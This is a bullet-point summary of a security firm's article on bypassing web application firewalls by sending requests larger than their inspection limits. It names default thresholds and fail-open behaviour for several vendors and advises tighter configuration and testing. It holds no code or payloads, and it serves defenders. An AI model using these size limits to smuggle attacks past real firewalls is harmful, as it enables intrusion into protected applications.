Source: Black Hills Information Security, Inc.
Author: BHIS
URL: https://www.blackhillsinfosec.com/bypassing-wafs-using-oversized-requests/
Bypassing WAFs Using Oversized Requests
ONE SENTENCE SUMMARY:
Exploiting WAF limitations with oversized request bypass techniques highlights the need for careful security configuration and testing.
MAIN POINTS:
- Oversized requests can bypass many web application firewalls, exploiting size limits on request processing.
- WAF configuration determines exploitability; some allow bypass by default due to flexible design goals.
- Examples given include testing WAFs like Cloudflare, Barracuda, ModSecurity, AWS, Azure, Google, Sucuri, and Fortinet.
- Cloudflare’s free tier can be bypassed with requests above 8KB, while higher tiers have larger limits.
- Barracuda’s WAF is secure by default, lacking size-based vulnerabilities without manual configuration.
- ModSecurity requires settings adjustments from default to secure, as it starts in detection-only mode.
- AWS limits WAF inspection to the first 8KB by default for certain services, with options to increase.
- Azure’s Application Gateway has a secure “fail closed” design, unlike Azure Front Door, which defaults insecurely.
- Google Cloud Armor and Sucuri default to vulnerable configurations, allowing large requests by default limits.
- Balancing WAF performance, usability, and security is crucial, with appropriate rule adjustments necessary.
TAKEAWAYS:
- Oversized requests exploit WAF limits, necessitating tailored configurations for secure operation.
- Cloudflare, AWS, and ModSecurity often need manual rule adjustments to close security gaps.
- Azure’s Application Gateway is inherently secure against oversized request bypasses due to its “fail closed” design.
- Real-world application behavior should inform WAF configurations to effectively handle scale and security needs.
- Testing WAFs for both rule coverage and handling of resource limits is essential for robust protection.